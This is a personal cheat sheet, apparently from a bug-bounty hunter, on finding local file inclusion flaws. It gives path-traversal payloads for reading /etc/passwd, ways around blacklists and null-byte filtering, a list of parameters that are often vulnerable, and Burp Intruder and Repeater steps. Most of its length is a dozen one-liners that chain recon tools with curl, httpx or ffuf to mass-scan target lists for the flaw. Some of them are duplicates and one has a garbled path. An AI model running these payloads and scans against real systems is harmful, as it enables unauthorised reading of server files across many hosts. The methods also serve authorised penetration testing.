🧨My LFI Methodology
TIP: file:///etc/passwd : Not authorized
file://\/\/etc/passwd : Work
---------------------------------------------------------------
TIP: file:///etc/passwd blacklisted?
Use "view-source:file:///etc/passwd" "view-source" is often forgotten by developers in blacklists.
---------------------------------------------------------------
File Download to Check LFI
File Download Path Send to Burp intruder
Select Parameter Value to Payload Position
Select Burp Payload List: Fuzzing-Path Traversal (Single File)
Configuring the file name from Payload Processing -> Match/Replace rule:
Match regex: \{file\}
Replace with: etc/passwd
---------------------------------------------------------------
Check LFI Methods
File Download Path Send to Burp Repeater
Select Parameter Value to check Payload one by one
../../../etc/passwd <-- using Simple Check
/etc/passwd <-- using blocks directory traversal Sequences
....//....//....//etc/passwd <-- usingsequences stripped non-recursively
/var/www/images/../../../etc/passwd <-- using Default directories
../../../etc/passwd%00.png <-- with file extension using null byte
-------------------------------------------------------------
Top 25 parameters
Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities
?cat={payload} ?dir={payload} ?action={payload} ?board={payload} ?date={payload} ?detail={payload} ?file={payload} ?download={payload} ?path={payload} ?folder={payload} ?prefix={payload} ?include={payload} ?page={payload} ?inc={payload} ?locate={payload} ?show={payload} ?doc={payload} ?site={payload} ?type={payload} ?view={payload} ?content={payload} ?document={payload} ?layout={payload} ?mod={payload} ?conf={payload}
---------------------------------------------------------------
Local file inclusion at filemanager.php Endpoint
Parameter: path=
Payload: //....//....//....//....//....//....//....//....//....//etc/passwd
----------------------------------------------------------------
LFI Automate this with a one-liner
cat roots | assetfinder -subs-only | waybackurls | qsreplace "//....//....//....//....//....//....//....//....//....//etc/passwd" | httpx -nc -silent -mr "root:x" -t 5
----------------------------------------------------------------
(1) One-Liner LFI Finding
gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'----------------------------------------------------------------
(2) One-Liner LFI Finding
echo http://testphp.vulnweb.com | gau | gf lfi | bhedak ".%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" | httpx -silent -ms "root:x:"----------------------------------------------------------------
(3) One-Liner LFI Finding
waybackurls http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'----------------------------------------------------------------
(4) One-Liner LFI Finding
cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n";done----------------------------------------------------------------
(5) One-Liner LFI Finding
findomain -t http://testphp.vulnweb.com -q | /root/go/bin/waybackurls | /root/go/bin/gf lfi | /root/go/bin/qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt ; done----------------------------------------------------------------
(6) One-Liner NGINX LFI Finding
httpx -l file.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'----------------------------------------------------------------
(7) One-Liner LFI Finding
waybackurls http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'----------------------------------------------------------------
(8) One-Liner LFI Finding
cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/ cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n";done----------------------------------------------------------------
(8) One-Liner LFI Finding
gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | httpx -t 250 -mr "root:x"----------------------------------------------------------------
(9) One-Liner LFI Finding
gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'----------------------------------------------------------------
(10) One-Liner LFI Finding
cat targets.txt | /root/go/bin/httpx -nc -t 250 -p 80,443,8080,8443,4443,8888 -path "///////../../../ctc/paawd" -mr "root:x" | /root/go/bin/anew lfi-httpx.txt----------------------------------------------------------------
(11) One-Liner LFI Finding
cat targets.txt | httpx -silent -threads 500 | gau | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
----------------------------------------------------------------
(12) One-Liner LFI Finding
findomain -t vulnweb.com -q | /root/go/bin/waybackurls | /root/go/bin/gf lfi | /root/go/bin/qsreplace FUZZ | while read url ; do ffuf -u $url -mr "root:x" -w ~/wordlist/LFI.txt ; done----------------------------------------------------------------
Endpoint of attack parameter
(dest =, redirect=,uri=,url=,path=,continue=,window,next,data,reference,site,html,val,validate,domain,callback,return,page,view,dir,show,file,document,root,folder,root,pg,style,pdf,feed,port,to,oot,navigation,open,result)
----------------------------------------------------------------
How to Find LFI Manual Using Burp Hackbar
1st target add to Scope then Crawling Pages and endpoints like: Page= , path=, file= open the Burp tab and click to Search Buton and Search for lfi Endpoints like: file= in Request Body then request sent to Repeater add to Lfi Payloads like: GET /showimage.php?file=../../etc/passwd using burp Hackbar and looking fo Responce then BOOM
----------------------------------------------------------------
How to Find LFI Using Burp Intruder | LFI Payload.txt
1st target add to Scope then Crawling Pages and endpoints like: Page= , path=, file= open the Burp tab and click to Search Buton and Search for lfi Endpoints like: file= in Request Body then request sent to Burp intruder and Select the Payload Position After Endpoint like: GET /showimage.php?file=../../etc/passwd and add to LFI_Payloads.txt in Payload Section then go to option tab and add to text root❌0:0:root: Grep-Mathch Section and start the Attack and looking for root❌0:0:root: Coloum Responce then BOOM
----------------------------------------------------------------
How to Find LFI Using wayback | gf | Burp Hackbar
/root/go/bin/waybackurl -u Target.com | /root/go/bin/gf lfi >> lfi.txt cat lfi.txt and Search for lfi Endpoints like: Page= , path= , file= in URl then open browser then request sent to Burp Repeater add to Lfi Payloads like: GET /showimage.php?file=../../etc/passwd using burp Hackbar and looking fo Responce then BOOM
----------------------------------------------------------------
How to Find LFI Using wayback | gf | Burp Intruder | LFI Payload.txt
/root/go/bin/waybackurl -u Target.com | /root/go/bin/gf lfi >> lfi.txt cat lfi.txt and Search for lfi Endpoints like: Page= , path= , file= in URl then open browser then request sent to Burp intruder and Select the Payload Position After Endpoint like: GET /showimage.php?file=../../etc/passwd and add to LFI_Payloads.txt in Payload Section then go to option tab and add to text root❌0:0:root: Grep-Mathch Section and start the Attack and looking for root❌0:0:root: Coloum Responce then BOOM
----------------------------------------------------------------
Last updated